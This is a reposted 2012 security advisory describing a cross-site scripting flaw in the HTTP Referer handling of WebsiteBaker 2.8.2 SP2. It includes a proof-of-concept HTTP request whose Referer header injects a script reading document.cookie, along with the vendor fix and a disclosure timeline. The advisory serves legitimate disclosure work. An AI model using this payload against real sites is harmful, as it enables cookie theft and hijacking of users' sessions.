WebsiteBaker version 2.8.2 SP2 suffers from an HTTP-Referer a cross site scripting vulnerability.
1c9e749707069a2cac4eba4307bd9fe519f8799a7e7cfcd0b1320faea6e6f67fAdvisory: WebsiteBaker 2.8.2 SP2 HTTP-Referer XSS vulnerability
Advisory ID: SSCHADV2012-003
Author: Stefan Schurtz
Affected Software: Successfully tested on WebsiteBaker 2.8.2 SP2
Vendor URL: www.websitebaker2.org
Vendor Status: fixed
==========================
Vulnerability Description
==========================
HTTP-Referer in WebsiteBaker 2.8.2 SP2 is prone to a XSS vulnerability
==================
PoC-Exploit
==================
http://[target]/wb/search/index.php
http://[target]/wb/account/forgot.php
Host: [target]
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: keep-alive
Referer: '"/><script>alert(document.cookie)</script>
=========
Solution
=========
Upgrade to WebsiteBaker 2.8.3
====================
Disclosure Timeline
====================
31-Jan-2012 - vendor informed
31-Jan-2012 - release date of this security advisory
13-Feb-2012 - fixed by vendor
========
Credits
========
Vulnerability found and advisory written by Stefan Schurtz.
===========
References
===========
http://www.darksecurity.de/advisories/2012/SSCHADV2012-003.txt
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed